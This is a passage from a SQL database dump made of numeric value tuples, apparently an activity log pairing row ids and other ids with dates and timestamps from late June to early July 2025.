16:08:45'),(87746,4753,1,'2025-06-21','2025-06-21 16:15:43'),(87747,4404,1,'2025-06-21','2025-06-21 16:22:34'),(87748,5449,1,'2025-06-21','2025-06-21 16:26:33'),(87749,4648,1,'2025-06-21','2025-06-21 16:41:59'),(87750,5101,1,'2025-06-21','2025-06-21 17:02:59'),(87751,4582,1,'2025-06-21','2025-06-21 17:13:35'),(87752,5449,1,'2025-06-21','2025-06-21 17:34:44'),(87753,3261,1,'2025-06-21','2025-06-21 17:52:12'),(87754,5454,1,'2025-06-21','2025-06-21 17:56:18'),(87755,4950,1,'2025-06-21','2025-06-21 18:11:23'),(87756,4591,1,'2025-06-21','2025-06-21 18:17:18'),(87757,5326,1,'2025-06-21','2025-06-21 20:22:35'),(87758,3781,1,'2025-06-21','2025-06-21 20:26:25'),(87759,470,1,'2025-06-21','2025-06-21 22:18:45'),(87760,4440,1,'2025-06-21','2025-06-21 23:09:25'),(87761,3706,1,'2025-06-21','2025-06-21 23:25:53'),(87762,4674,1,'2025-06-21','2025-06-21 23:34:01'),(87763,5317,1,'2025-06-22','2025-06-22 03:08:44'),(87764,5415,1,'2025-06-22','2025-06-22 03:36:36'),(87765,4566,1,'2025-06-22','2025-06-22 05:23:26'),(87766,5436,1,'2025-06-22','2025-06-22 11:45:14'),(87767,4416,1,'2025-06-22','2025-06-22 11:46:04'),(87768,487,1,'2025-06-22','2025-06-22 11:48:05'),(87769,4639,1,'2025-06-22','2025-06-22 12:38:31'),(87770,4741,1,'2025-06-22','2025-06-22 12:38:32'),(87771,2503,1,'2025-06-22','2025-06-22 13:44:06'),(87772,5397,1,'2025-06-22','2025-06-22 14:00:02'),(87773,4420,1,'2025-06-22','2025-06-22 14:15:01'),(87774,2813,1,'2025-06-22','2025-06-22 14:45:00'),(87775,108,1,'2025-06-22','2025-06-22 16:12:33'),(87776,91,1,'2025-06-22','2025-06-22 16:47:10'),(87777,482,1,'2025-06-22','2025-06-22 17:35:04'),(87778,1582,1,'2025-06-22','2025-06-22 17:46:44'),(87779,76,1,'2025-06-22','2025-06-22 17:47:21'),(87780,68,1,'2025-06-22','2025-06-22 17:47:28'),(87781,80,1,'2025-06-22','2025-06-22 17:49:51'),(87782,3781,1,'2025-06-22','2025-06-22 18:03:52'),(87783,4756,1,'2025-06-22','2025-06-22 19:32:42'),(87784,4753,1,'2025-06-22','2025-06-22 19:37:25'),(87785,4648,1,'2025-06-22','2025-06-22 19:42:52'),(87786,4674,1,'2025-06-22','2025-06-22 19:51:10'),(87787,4566,1,'2025-06-22','2025-06-22 19:58:48'),(87788,4424,1,'2025-06-22','2025-06-22 20:12:04'),(87789,5356,1,'2025-06-22','2025-06-22 21:41:20'),(87790,4674,1,'2025-06-22','2025-06-22 23:28:30'),(87791,4566,1,'2025-06-22','2025-06-22 23:35:04'),(87792,4756,1,'2025-06-22','2025-06-22 23:45:06'),(87793,4648,1,'2025-06-22','2025-06-22 23:50:24'),(87794,4750,1,'2025-06-23','2025-06-23 01:21:46'),(87795,1582,1,'2025-06-23','2025-06-23 04:39:28'),(87796,4897,1,'2025-06-23','2025-06-23 05:37:09'),(87797,5441,1,'2025-06-23','2025-06-23 06:03:24'),(87798,3083,1,'2025-06-23','2025-06-23 07:17:02'),(87799,5037,1,'2025-06-23','2025-06-23 07:59:35'),(87800,89,1,'2025-06-23','2025-06-23 11:00:48'),(87801,89,1,'2025-06-23','2025-06-23 11:01:41'),(87802,91,1,'2025-06-23','2025-06-23 11:02:35'),(87803,5415,1,'2025-06-23','2025-06-23 11:03:21'),(87804,4944,1,'2025-06-23','2025-06-23 11:38:15'),(87805,4930,1,'2025-06-23','2025-06-23 11:38:53'),(87806,5449,1,'2025-06-23','2025-06-23 11:54:49'),(87807,4950,1,'2025-06-23','2025-06-23 14:19:26'),(87808,4874,1,'2025-06-23','2025-06-23 14:53:34'),(87809,91,1,'2025-06-23','2025-06-23 18:22:52'),(87810,4238,1,'2025-06-23','2025-06-23 18:31:20'),(87811,4950,1,'2025-06-23','2025-06-23 20:29:15'),(87812,80,1,'2025-06-23','2025-06-23 20:30:18'),(87813,477,1,'2025-06-23','2025-06-23 21:49:20'),(87814,335,1,'2025-06-23','2025-06-23 21:49:46'),(87815,4301,1,'2025-06-24','2025-06-24 00:01:14'),(87816,2410,1,'2025-06-24','2025-06-24 01:05:51'),(87817,3282,1,'2025-06-24','2025-06-24 01:06:43'),(87818,4750,1,'2025-06-24','2025-06-24 01:28:35'),(87819,1730,1,'2025-06-24','2025-06-24 01:46:08'),(87820,3097,1,'2025-06-24','2025-06-24 01:53:41'),(87821,4520,1,'2025-06-24','2025-06-24 02:13:17'),(87822,4448,1,'2025-06-24','2025-06-24 02:35:51'),(87823,3735,1,'2025-06-24','2025-06-24 02:40:30'),(87824,4756,1,'2025-06-24','2025-06-24 02:45:36'),(87825,2503,1,'2025-06-24','2025-06-24 03:35:35'),(87826,80,1,'2025-06-24','2025-06-24 03:49:01'),(87827,2411,1,'2025-06-24','2025-06-24 03:54:18'),(87828,5457,1,'2025-06-24','2025-06-24 06:50:01'),(87829,4930,1,'2025-06-24','2025-06-24 07:06:02'),(87830,470,1,'2025-06-24','2025-06-24 07:12:49'),(87831,1877,1,'2025-06-24','2025-06-24 08:28:46'),(87832,5359,1,'2025-06-24','2025-06-24 08:53:33'),(87833,4681,1,'2025-06-24','2025-06-24 08:59:02'),(87834,5457,1,'2025-06-24','2025-06-24 09:01:42'),(87835,4976,1,'2025-06-24','2025-06-24 09:14:17'),(87836,4996,1,'2025-06-24','2025-06-24 09:44:57'),(87837,91,1,'2025-06-24','2025-06-24 10:52:47'),(87838,1612,1,'2025-06-24','2025-06-24 10:54:06'),(87839,487,1,'2025-06-24','2025-06-24 10:54:14'),(87840,4950,1,'2025-06-24','2025-06-24 12:40:33'),(87841,5457,1,'2025-06-24','2025-06-24 14:23:29'),(87842,5461,1,'2025-06-24','2025-06-24 14:23:46'),(87843,5457,1,'2025-06-24','2025-06-24 14:24:38'),(87844,5461,1,'2025-06-24','2025-06-24 14:30:21'),(87845,5461,1,'2025-06-24','2025-06-24 14:37:13'),(87846,1612,1,'2025-06-24','2025-06-24 14:59:41'),(87847,68,1,'2025-06-24','2025-06-24 15:00:20'),(87848,5457,1,'2025-06-24','2025-06-24 15:01:51'),(87849,5346,1,'2025-06-24','2025-06-24 15:23:36'),(87850,5464,1,'2025-06-24','2025-06-24 18:24:49'),(87851,5464,1,'2025-06-24','2025-06-24 18:24:57'),(87852,5457,1,'2025-06-24','2025-06-24 18:24:57'),(87853,5464,1,'2025-06-24','2025-06-24 18:28:30'),(87854,5461,1,'2025-06-24','2025-06-24 18:28:45'),(87855,5461,1,'2025-06-24','2025-06-24 18:29:32'),(87856,5464,1,'2025-06-24','2025-06-24 18:29:51'),(87857,5464,1,'2025-06-24','2025-06-24 18:49:03'),(87858,473,1,'2025-06-24','2025-06-24 19:02:03'),(87859,91,1,'2025-06-24','2025-06-24 19:06:38'),(87860,2503,1,'2025-06-24','2025-06-24 19:32:08'),(87861,5461,1,'2025-06-24','2025-06-24 19:55:27'),(87862,5457,1,'2025-06-24','2025-06-24 20:22:46'),(87863,5310,1,'2025-06-24','2025-06-24 20:27:45'),(87864,4750,1,'2025-06-24','2025-06-24 20:52:38'),(87865,1612,1,'2025-06-24','2025-06-24 21:20:10'),(87866,4944,1,'2025-06-24','2025-06-24 21:34:19'),(87867,4520,1,'2025-06-24','2025-06-24 22:41:20'),(87868,5464,1,'2025-06-24','2025-06-24 22:52:45'),(87869,5461,1,'2025-06-25','2025-06-25 01:20:05'),(87870,91,1,'2025-06-25','2025-06-25 01:55:19'),(87871,5464,1,'2025-06-25','2025-06-25 02:07:59'),(87872,5461,1,'2025-06-25','2025-06-25 02:10:31'),(87873,5454,1,'2025-06-25','2025-06-25 02:13:34'),(87874,4976,1,'2025-06-25','2025-06-25 02:16:01'),(87875,4976,1,'2025-06-25','2025-06-25 02:17:49'),(87876,4976,1,'2025-06-25','2025-06-25 02:19:31'),(87877,4976,1,'2025-06-25','2025-06-25 02:19:34'),(87878,5454,1,'2025-06-25','2025-06-25 02:22:37'),(87879,5454,1,'2025-06-25','2025-06-25 02:23:02'),(87880,5461,1,'2025-06-25','2025-06-25 02:23:15'),(87881,5464,1,'2025-06-25','2025-06-25 02:23:19'),(87882,87,1,'2025-06-25','2025-06-25 02:23:42'),(87883,482,1,'2025-06-25','2025-06-25 02:24:05'),(87884,87,1,'2025-06-25','2025-06-25 02:24:19'),(87885,481,1,'2025-06-25','2025-06-25 02:24:26'),(87886,87,1,'2025-06-25','2025-06-25 02:24:40'),(87887,467,1,'2025-06-25','2025-06-25 02:25:11'),(87888,5457,1,'2025-06-25','2025-06-25 06:35:54'),(87889,91,1,'2025-06-25','2025-06-25 07:27:09'),(87890,5467,1,'2025-06-25','2025-06-25 07:27:30'),(87891,5467,1,'2025-06-25','2025-06-25 07:27:30'),(87892,5467,1,'2025-06-25','2025-06-25 07:29:01'),(87893,5467,1,'2025-06-25','2025-06-25 07:29:54'),(87894,5467,1,'2025-06-25','2025-06-25 07:32:58'),(87895,5472,1,'2025-06-25','2025-06-25 07:49:37'),(87896,91,1,'2025-06-25','2025-06-25 07:56:41'),(87897,5472,1,'2025-06-25','2025-06-25 08:16:55'),(87898,5472,1,'2025-06-25','2025-06-25 08:54:05'),(87899,5476,1,'2025-06-25','2025-06-25 09:02:12'),(87900,72,1,'2025-06-25','2025-06-25 09:02:33'),(87901,5116,1,'2025-06-25','2025-06-25 09:03:22'),(87902,72,1,'2025-06-25','2025-06-25 09:03:47'),(87903,5476,1,'2025-06-25','2025-06-25 09:04:14'),(87904,72,1,'2025-06-25','2025-06-25 09:10:05'),(87905,5371,1,'2025-06-25','2025-06-25 09:10:21'),(87906,5467,1,'2025-06-25','2025-06-25 09:15:37'),(87907,72,1,'2025-06-25','2025-06-25 09:26:51'),(87908,5476,1,'2025-06-25','2025-06-25 09:26:59'),(87909,5476,1,'2025-06-25','2025-06-25 09:39:03'),(87910,5476,1,'2025-06-25','2025-06-25 09:41:01'),(87911,5476,1,'2025-06-25','2025-06-25 09:52:32'),(87912,5461,1,'2025-06-25','2025-06-25 09:57:55'),(87913,5476,1,'2025-06-25','2025-06-25 10:13:01'),(87914,5464,1,'2025-06-25','2025-06-25 10:23:49'),(87915,1751,1,'2025-06-25','2025-06-25 11:03:26'),(87916,5461,1,'2025-06-25','2025-06-25 11:49:15'),(87917,3097,1,'2025-06-25','2025-06-25 13:29:15'),(87918,5464,1,'2025-06-25','2025-06-25 15:45:19'),(87919,5457,1,'2025-06-25','2025-06-25 15:45:29'),(87920,5457,1,'2025-06-25','2025-06-25 15:46:22'),(87921,5464,1,'2025-06-25','2025-06-25 15:46:31'),(87922,3781,1,'2025-06-25','2025-06-25 16:21:20'),(87923,3781,1,'2025-06-25','2025-06-25 16:27:51'),(87924,5476,1,'2025-06-25','2025-06-25 18:38:28'),(87925,91,1,'2025-06-25','2025-06-25 19:24:20'),(87926,5476,1,'2025-06-25','2025-06-25 21:08:09'),(87927,91,1,'2025-06-25','2025-06-25 22:36:20'),(87928,5157,1,'2025-06-25','2025-06-25 22:37:19'),(87929,5157,1,'2025-06-25','2025-06-25 22:37:20'),(87930,91,1,'2025-06-25','2025-06-25 22:38:01'),(87931,68,1,'2025-06-25','2025-06-25 22:38:58'),(87932,2178,1,'2025-06-25','2025-06-25 22:59:54'),(87933,5425,1,'2025-06-26','2025-06-26 01:00:10'),(87934,1734,1,'2025-06-26','2025-06-26 03:28:56'),(87935,91,1,'2025-06-26','2025-06-26 03:50:35'),(87936,5464,1,'2025-06-26','2025-06-26 05:33:24'),(87937,5415,1,'2025-06-26','2025-06-26 08:14:06'),(87938,4654,1,'2025-06-26','2025-06-26 08:40:35'),(87939,3267,1,'2025-06-26','2025-06-26 11:11:25'),(87940,72,1,'2025-06-26','2025-06-26 11:14:58'),(87941,5484,1,'2025-06-26','2025-06-26 11:15:23'),(87942,72,1,'2025-06-26','2025-06-26 11:16:37'),(87943,5476,1,'2025-06-26','2025-06-26 11:17:00'),(87944,72,1,'2025-06-26','2025-06-26 11:17:51'),(87945,5484,1,'2025-06-26','2025-06-26 11:18:10'),(87946,5484,1,'2025-06-26','2025-06-26 11:33:36'),(87947,3083,1,'2025-06-26','2025-06-26 11:52:21'),(87948,5334,1,'2025-06-26','2025-06-26 12:44:05'),(87949,5320,1,'2025-06-26','2025-06-26 14:18:34'),(87950,5420,1,'2025-06-26','2025-06-26 15:20:37'),(87951,1766,1,'2025-06-26','2025-06-26 19:21:27'),(87952,91,1,'2025-06-26','2025-06-26 19:29:09'),(87953,4341,1,'2025-06-26','2025-06-26 20:44:17'),(87954,5484,1,'2025-06-26','2025-06-26 20:57:26'),(87955,89,1,'2025-06-26','2025-06-26 21:15:14'),(87956,1604,1,'2025-06-26','2025-06-26 21:30:46'),(87957,2993,1,'2025-06-26','2025-06-26 22:59:10'),(87958,5409,1,'2025-06-27','2025-06-27 03:15:41'),(87959,5484,1,'2025-06-27','2025-06-27 05:13:49'),(87960,5476,1,'2025-06-27','2025-06-27 06:29:34'),(87961,4827,1,'2025-06-27','2025-06-27 06:49:23'),(87962,91,1,'2025-06-27','2025-06-27 07:21:34'),(87963,467,1,'2025-06-27','2025-06-27 10:03:55'),(87964,5484,1,'2025-06-27','2025-06-27 10:09:19'),(87965,4950,1,'2025-06-27','2025-06-27 11:19:29'),(87966,5489,1,'2025-06-27','2025-06-27 11:51:50'),(87967,5489,1,'2025-06-27','2025-06-27 11:53:12'),(87968,5484,1,'2025-06-27','2025-06-27 11:53:41'),(87969,5489,1,'2025-06-27','2025-06-27 11:53:42'),(87970,5489,1,'2025-06-27','2025-06-27 11:54:04'),(87971,5489,1,'2025-06-27','2025-06-27 11:54:36'),(87972,5489,1,'2025-06-27','2025-06-27 12:00:29'),(87973,5489,1,'2025-06-27','2025-06-27 12:01:29'),(87974,5489,1,'2025-06-27','2025-06-27 12:26:28'),(87975,5489,1,'2025-06-27','2025-06-27 12:37:10'),(87976,5489,1,'2025-06-27','2025-06-27 12:41:06'),(87977,5476,1,'2025-06-27','2025-06-27 13:06:13'),(87978,5489,1,'2025-06-27','2025-06-27 13:12:50'),(87979,5457,1,'2025-06-27','2025-06-27 13:13:24'),(87980,5489,1,'2025-06-27','2025-06-27 14:32:37'),(87981,5489,1,'2025-06-27','2025-06-27 15:18:35'),(87982,4911,1,'2025-06-27','2025-06-27 15:56:50'),(87983,4556,1,'2025-06-27','2025-06-27 16:41:32'),(87984,76,1,'2025-06-27','2025-06-27 17:00:00'),(87985,5489,1,'2025-06-27','2025-06-27 17:25:55'),(87986,4756,1,'2025-06-27','2025-06-27 18:32:25'),(87987,5400,1,'2025-06-27','2025-06-27 19:34:12'),(87988,5489,1,'2025-06-27','2025-06-27 20:07:35'),(87989,91,1,'2025-06-27','2025-06-27 20:12:21'),(87990,5289,1,'2025-06-27','2025-06-27 20:28:52'),(87991,5289,1,'2025-06-27','2025-06-27 20:36:35'),(87992,5307,1,'2025-06-27','2025-06-27 21:34:15'),(87993,5420,1,'2025-06-27','2025-06-27 22:48:02'),(87994,4950,1,'2025-06-27','2025-06-27 23:55:30'),(87995,2904,1,'2025-06-27','2025-06-27 23:57:57'),(87996,2904,1,'2025-06-27','2025-06-27 23:58:09'),(87997,74,1,'2025-06-27','2025-06-27 23:59:36'),(87998,5400,1,'2025-06-28','2025-06-28 00:18:52'),(87999,5037,1,'2025-06-28','2025-06-28 00:58:50'),(88000,5472,1,'2025-06-28','2025-06-28 01:58:19'),(88001,5484,1,'2025-06-28','2025-06-28 03:03:52'),(88002,5472,1,'2025-06-28','2025-06-28 03:18:39'),(88003,5467,1,'2025-06-28','2025-06-28 03:28:55'),(88004,5467,1,'2025-06-28','2025-06-28 04:10:17'),(88005,3083,1,'2025-06-28','2025-06-28 07:40:59'),(88006,5276,1,'2025-06-28','2025-06-28 08:44:52'),(88007,5476,1,'2025-06-28','2025-06-28 09:04:20'),(88008,84,1,'2025-06-28','2025-06-28 09:28:40'),(88009,87,1,'2025-06-28','2025-06-28 09:28:43'),(88010,89,1,'2025-06-28','2025-06-28 09:28:46'),(88011,4930,1,'2025-06-28','2025-06-28 09:28:49'),(88012,5436,1,'2025-06-28','2025-06-28 10:01:46'),(88013,3083,1,'2025-06-28','2025-06-28 10:19:19'),(88014,5420,1,'2025-06-28','2025-06-28 13:16:32'),(88015,74,1,'2025-06-28','2025-06-28 14:15:08'),(88016,2993,1,'2025-06-28','2025-06-28 14:40:54'),(88017,1745,1,'2025-06-28','2025-06-28 16:01:02'),(88018,2991,1,'2025-06-28','2025-06-28 18:07:14'),(88019,335,1,'2025-06-28','2025-06-28 19:26:44'),(88020,4950,1,'2025-06-28','2025-06-28 19:38:25'),(88021,4950,1,'2025-06-28','2025-06-28 19:38:42'),(88022,4950,1,'2025-06-28','2025-06-28 19:38:47'),(88023,72,1,'2025-06-28','2025-06-28 19:47:11'),(88024,3781,1,'2025-06-28','2025-06-28 19:55:31'),(88025,2956,1,'2025-06-28','2025-06-28 19:58:04'),(88026,3781,1,'2025-06-28','2025-06-28 19:59:37'),(88027,87,1,'2025-06-28','2025-06-28 20:13:36'),(88028,91,1,'2025-06-28','2025-06-28 21:06:10'),(88029,5062,1,'2025-06-29','2025-06-29 01:22:17'),(88030,72,1,'2025-06-29','2025-06-29 03:46:05'),(88031,87,1,'2025-06-29','2025-06-29 04:12:16'),(88032,1604,1,'2025-06-29','2025-06-29 07:49:49'),(88033,5464,1,'2025-06-29','2025-06-29 09:24:50'),(88034,2993,1,'2025-06-29','2025-06-29 09:34:24'),(88035,72,1,'2025-06-29','2025-06-29 11:45:33'),(88036,5280,1,'2025-06-29','2025-06-29 11:51:44'),(88037,87,1,'2025-06-29','2025-06-29 12:11:38'),(88038,5415,1,'2025-06-29','2025-06-29 14:23:39'),(88039,4608,1,'2025-06-29','2025-06-29 16:36:11'),(88040,5476,1,'2025-06-29','2025-06-29 19:25:53'),(88041,5457,1,'2025-06-29','2025-06-29 19:26:57'),(88042,72,1,'2025-06-29','2025-06-29 19:44:37'),(88043,87,1,'2025-06-29','2025-06-29 20:11:12'),(88044,4950,1,'2025-06-29','2025-06-29 21:27:01'),(88045,91,1,'2025-06-29','2025-06-29 21:36:56'),(88046,5489,1,'2025-06-30','2025-06-30 00:33:48'),(88047,5289,1,'2025-06-30','2025-06-30 00:37:35'),(88048,2503,1,'2025-06-30','2025-06-30 00:39:54'),(88049,72,1,'2025-06-30','2025-06-30 03:42:54'),(88050,87,1,'2025-06-30','2025-06-30 04:11:02'),(88051,3280,1,'2025-06-30','2025-06-30 06:03:02'),(88052,4950,1,'2025-06-30','2025-06-30 06:31:46'),(88053,5476,1,'2025-06-30','2025-06-30 08:22:39'),(88054,84,1,'2025-06-30','2025-06-30 09:30:14'),(88055,87,1,'2025-06-30','2025-06-30 09:30:17'),(88056,89,1,'2025-06-30','2025-06-30 09:30:19'),(88057,4930,1,'2025-06-30','2025-06-30 09:30:24'),(88058,1610,1,'2025-06-30','2025-06-30 10:02:51'),(88059,72,1,'2025-06-30','2025-06-30 11:41:43'),(88060,87,1,'2025-06-30','2025-06-30 12:11:12'),(88061,3096,1,'2025-06-30','2025-06-30 13:04:46'),(88062,3226,1,'2025-06-30','2025-06-30 14:51:33'),(88063,4556,1,'2025-06-30','2025-06-30 16:03:27'),(88064,4556,1,'2025-06-30','2025-06-30 16:03:29'),(88065,474,1,'2025-06-30','2025-06-30 19:37:42'),(88066,72,1,'2025-06-30','2025-06-30 19:40:07'),(88067,473,1,'2025-06-30','2025-06-30 19:58:52'),(88068,91,1,'2025-06-30','2025-06-30 19:59:17'),(88069,5363,1,'2025-06-30','2025-06-30 19:59:59'),(88070,5363,1,'2025-06-30','2025-06-30 20:00:00'),(88071,91,1,'2025-06-30','2025-06-30 20:01:06'),(88072,5054,1,'2025-06-30','2025-06-30 20:03:26'),(88073,91,1,'2025-06-30','2025-06-30 20:04:00'),(88074,5042,1,'2025-06-30','2025-06-30 20:05:12'),(88075,87,1,'2025-06-30','2025-06-30 20:10:19'),(88076,3092,1,'2025-06-30','2025-06-30 21:11:10'),(88077,91,1,'2025-06-30','2025-06-30 22:26:06'),(88078,4785,1,'2025-06-30','2025-06-30 22:53:38'),(88079,4404,1,'2025-07-01','2025-07-01 00:17:29'),(88080,4587,1,'2025-07-01','2025-07-01 00:28:45'),(88081,4587,1,'2025-07-01','2025-07-01 00:30:02'),(88082,4587,1,'2025-07-01','2025-07-01 01:15:56'),(88083,4587,1,'2025-07-01','2025-07-01 01:29:16'),(88084,4830,1,'2025-07-01','2025-07-01 02:03:54'),(88085,3541,1,'2025-07-01','2025-07-01 03:00:27'),(88086,72,1,'2025-07-01','2025-07-01 03:39:12'),(88087,87,1,'2025-07-01','2025-07-01 04:09:17'),(88088,5441,1,'2025-07-01','2025-07-01 06:14:26'),(88089,2503,1,'2025-07-01','2025-07-01 06:20:33'),(88090,4420,1,'2025-07-01','2025-07-01 06:37:38'),(88091,5314,1,'2025-07-01','2025-07-01 09:56:13'),(88092,468,1,'2025-07-01','2025-07-01 10:23:57'),(88093,4520,1,'2025-07-01','2025-07-01 11:21:14'),(88094,72,1,'2025-07-01','2025-07-01 11:37:34'),(88095,87,1,'2025-07-01','2025-07-01 12:07:36'),(88096,3079,1,'2025-07-01','2025-07-01 12:41:14'),(88097,474,1,'2025-07-01','2025-07-01 15:13:32'),(88098,91,1,'2025-07-01','2025-07-01 15:13:48'),(88099,5259,1,'2025-07-01','2025-07-01 15:14:19'),(88100,4950,1,'2025-07-01','2025-07-01 15:19:16'),(88101,4660,1,'2025-07-01','2025-07-01 16:27:26'),(88102,5472,1,'2025-07-01','2025-07-01 17:04:48'),(88103,5472,1,'2025-07-01','2025-07-01 17:05:19'),(88104,5472,1,'2025-07-01','2025-07-01 17:05:22'),(88105,5467,1,'2025-07-01','2025-07-01 17:06:08'),(88106,76,1,'2025-07-01','2025-07-01 17:50:36'),(88107,4930,1,'2025-07-01','2025-07-01 17:51:05'),(88108,4963,1,'2025-07-01','2025-07-01 17:56:19'),(88109,4930,1,'2025-07-01','2025-07-01 17:56:37'),(88110,4960,1,'2025-07-01','2025-07-01 17:56:57'),(88111,4950,1,'2025-07-01','2025-07-01 17:57:08'),(88112,4911,1,'2025-07-01','2025-07-01 17:58:02'),(88113,4941,1,'2025-07-01','2025-07-01 17:58:52'),(88114,4944,1,'2025-07-01','2025-07-01 18:03:59'),(88115,87,1,'2025-07-01','2025-07-01 18:20:06'),(88116,72,1,'2025-07-01','2025-07-01 19:37:35'),(88117,3791,1,'2025-07-01','2025-07-01 19:47:03'),(88118,87,1,'2025-07-01','2025-07-01 20:06:45'),(88119,91,1,'2025-07-01','2025-07-01 23:18:46'),(88120,4301,1,'2025-07-02','2025-07-02 00:14:55'),(88121,3261,1,'2025-07-02','2025-07-02 00:58:15'),(88122,72,1,'2025-07-02','2025-07-02 03:36:06'),(88123,80,1,'2025-07-02','2025-07-02 03:42:46'),(88124,87,1,'2025-07-02','2025-07-02 04:06:20'),(88125,473,1,'2025-07-02','2025-07-02 04:39:33'),(88126,473,1,'2025-07-02','2025-07-02 04:52:12'),(88127,4941,1,'2025-07-02','2025-07-02 05:29:20'),(88128,68,1,'2025-07-02','2025-07-02 05:46:46'),(88129,2411,1,'2025-07-02','2025-07-02 05:55:58'),(88130,87,1,'2025-07-02','2025-07-02 06:22:35'),(88131,3710,1,'2025-07-02','2025-07-02 07:15:19'),(88132,3781,1,'2025-07-02','2025-07-02 07:16:20'),(88133,3781,1,'2025-07-02','2025-07-02 07:32:30'),(88134,5259,1,'2025-07-02','2025-07-02 07:34:01'),(88135,91,1,'2025-07-02','2025-07-02 07:34:02'),(88136,3781,1,'2025-07-02','2025-07-02 07:46:30'),(88137,3781,1,'2025-07-02','2025-07-02 07:57:40'),(88138,3781,1,'2025-07-02','2025-07-02 07:59:06'),(88139,3781,1,'2025-07-02','2025-07-02 08:14:33'),(88140,4835,1,'2025-07-02','2025-07-02 08:42:52'),(88141,4950,1,'2025-07-02','2025-07-02 08:57:20'),(88142,469,1,'2025-07-02','2025-07-02 10:20:20'),(88143,5157,1,'2025-07-02','2025-07-02 11:03:35'),(88144,5157,1,'2025-07-02','2025-07-02 11:08:10'),(88145,72,1,'2025-07-02','2025-07-02 11:36:44'),(88146,87,1,'2025-07-02','2025-07-02 12:04:59'),(88147,4966,1,'2025-07-02','2025-07-02 12:18:14'),(88148,4950,1,'2025-07-02','2025-07-02 12:36:22'),(88149,4440,1,'2025-07-02','2025-07-02 12:51:51'),(88150,3781,1,'2025-07-02','2025-07-02 13:23:53'),(88151,5467,1,'2025-07-02','2025-07-02 13:30:19'),(88152,4420,1,'2025-07-02','2025-07-02 13:53:35'),(88153,3781,1,'2025-07-02','2025-07-02 14:40:19'),(88154,3781,1,'2025-07-02','2025-07-02 14:48:22'),(88155,4950,1,'2025-07-02','2025-07-02 15:33:11'),(88156,5058,1,'2025-07-02','2025-07-02 15:56:51'),(88157,4344,1,'2025-07-02','2025-07-02 16:07:08'),(88158,1732,1,'2025-07-02','2025-07-02 18:11:38'),(88159,1590,1,'2025-07-02','2025-07-02 19:09:57'),(88160,72,1,'2025-07-02','2025-07-02 19:36:39'),(88161,91,1,'2025-07-02','2025-07-02 19:59:35'),(88162,87,1,'2025-07-02','2025-07-02 20:05:18'),(88163,474,1,'2025-07-02','2025-07-02 21:19:39'),(88164,4944,1,'2025-07-02','2025-07-02 21:36:49'),(88165,1743,1,'2025-07-02','2025-07-02 22:55:54'),(88166,91,1,'2025-07-02','2025-07-02 23:48:01'),(88167,3079,1,'2025-07-03','2025-07-03 00:21:36'),(88168,2993,1,'2025-07-03','2025-07-03 01:02:28'),(88169,91,1,'2025-07-03','2025-07-03 02:11:12'),(88170,72,1,'2025-07-03','2025-07-03 03:34:48'),(88171,1726,1,'2025-07-03','2025-07-03 04:02:13'),(88172,87,1,'2025-07-03','2025-07-03 04:04:58'),(88173,1544,1,'2025-07-03','2025-07-03 04:54:20'),(88174,5374,1,'2025-07-03','2025-07-03 06:59:30'),(88175,5259,1,'2025-07-03','2025-07-03 07:05:08'),(88176,91,1,'2025-07-03','2025-07-03 07:05:08'),(88177,91,1,'2025-07-03','2025-07-03 07:36:41'),(88178,91,1,'2025-07-03','2025-07-03 08:10:29'),(88179,5415,1,'2025-07-03','2025-07-03 08:10:48'),(88180,5259,1,'2025-07-03','2025-07-03 08:14:52'),(88181,5264,1,'2025-07-03','2025-07-03 08:17:56'),(88182,5264,1,'2025-07-03','2025-07-03 08:17:58'),(88183,91,1,'2025-07-03','2025-07-03 08:19:35'),(88184,5140,1,'2025-07-03','2025-07-03 08:19:40'),(88185,5140,1,'2025-07-03','2025-07-03 08:19:42'),(88186,91,1,'2025-07-03','2025-07-03 08:20:54'),(88187,5067,1,'2025-07-03','2025-07-03 08:21:16'),(88188,5076,1,'2025-07-03','2025-07-03 08:22:39'),(88189,5062,1,'2025-07-03','2025-07-03 08:26:01'),(88190,5378,1,'2025-07-03','2025-07-03 08:36:07'),(88191,4883,1,'2025-07-03','2025-07-03 08:48:26'),(88192,4448,1,'2025-07-03','2025-07-03 08:50:11'),(88193,2503,1,'2025-07-03','2025-07-03 08:50:14'),(88194,4802,1,'2025-07-03','2025-07-03 08:52:39'),(88195,4797,1,'2025-07-03','2025-07-03 08:58:02'),(88196,3243,1,'2025-07-03','2025-07-03 09:00:09'),(88197,3243,1,'2025-07-03','2025-07-03 09:00:26'),(88198,3243,1,'2025-07-03','2025-07-03 09:00:32'),(88199,3243,1,'2025-07-03','2025-07-03 09:00:39'),(88200,76,1,'2025-07-03','2025-07-03 09:00:50'),(88201,91,1,'2025-07-03','2025-07-03 09:01:05'),(88202,5054,1,'2025-07-03','2025-07-03 09:18:37'),(88203,2410,1,'2025-07-03','2025-07-03 09:57:48'),(88204,4950,1,'2025-07-03','2025-07-03 10:50:10'),(88205,76,1,'2025-07-03','2025-07-03 10:50:40'),(88206,68,1,'2025-07-03','2025-07-03 10:50:45'),(88207,5441,1,'2025-07-03','2025-07-03 11:18:04'),(88208,4238,1,'2025-07-03','2025-07-03 11:20:13'),(88209,72,1,'2025-07-03','2025-07-03 11:34:02'),(88210,87,1,'2025-07-03','2025-07-03 12:04:22'),(88211,1582,1,'2025-07-03','2025-07-03 14:11:38'),(88212,80,1,'2025-07-03','2025-07-03 16:33:09'),(88213,68,1,'2025-07-03','2025-07-03 16:33:14'),(88214,108,1,'2025-07-03','2025-07-03 16:33:20'),(88215,4941,1,'2025-07-03','2025-07-03 16:38:20'),(88216,5421,1,'2025-07-03','2025-07-03 17:41:24'),(88217,2395,1,'2025-07-03','2025-07-03 17:55:47'),(88218,3724,1,'2025-07-03','2025-07-03 18:15:19'),(88219,467,1,'2025-07-03','2025-07-03 19:19:19'),(88220,72,1,'2025-07-03','2025-07-03 19:34:41'),(88221,4832,1,'2025-07-03','2025-07-03 20:00:49'),(88222,87,1,'2025-07-03','2025-07-03 20:03:07'),(88223,5436,1,'2025-07-03','2025-07-03 20:05:55'),(88224,4612,1,'2025-07-03','2025-07-03 20:14:59'),(88225,4744,1,'2025-07-03','2025-07-03 20:21:55'),(88226,5157,1,'2025-07-03','2025-07-03 20:26:29'),(88227,335,1,'2025-07-03','2025-07-03 20:31:35'),(88228,335,1,'2025-07-03','2025-07-03 20:38:58'),(88229,3498,1,'2025-07-03','2025-07-03 20:39:26'),(88230,3280,1,'2025-07-03','2025-07-03 20:43:04'),(88231,3027,1,'2025-07-03','2025-07-03 20:56:25'),(88232,3030,1,'2025-07-03','2025-07-03 21:00:19'),(88233,1604,1,'2025-07-03','2025-07-03 